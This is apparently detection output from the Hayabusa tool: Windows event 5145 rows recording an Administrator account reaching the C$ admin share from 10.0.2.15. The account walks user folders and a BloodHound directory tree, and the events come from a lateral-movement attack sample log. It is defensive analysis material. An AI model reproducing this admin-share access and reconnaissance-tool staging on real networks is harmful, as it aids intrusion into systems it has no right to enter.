+2019-03-18 23:23:24.007 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Pictures  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Saved Games  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\sshd_server\Videos  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Contacts\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Documents\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.017 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Downloads\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Favorites\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Links\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Music\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Pictures\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Saved Games\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Searches\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Videos\desktop.ini  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.027 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Contacts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.037 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\locales  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.047 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\Ingestors\DebugBuilds  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.057 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.067 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\helpers  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\node_modules  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.077 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@babel\runtime\regenerator  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\css  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.087 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\less  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.097 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\scss  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\sprites  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\svgs  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.107 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@fortawesome\fontawesome-free\webfonts  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\@types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.117 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\bin  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\adler-32\types  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.127 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\.nyc_output  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.137 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\examples\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\lib  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\src  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.147 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\aphrodite\tests  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\asap  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.157 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\dist  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.167 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\async\internal  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.177 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\array  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\error  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.187 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\json  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\math  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.197 +09:00,PC01.example.corp,5145,informational,Network Share File Access,User: Administrator  :  Share Name: \\*\C$  :  Share Path: \??\C:\  :  File: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\babel-runtime\core-js\number  :  IP Address: 10.0.2.15,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
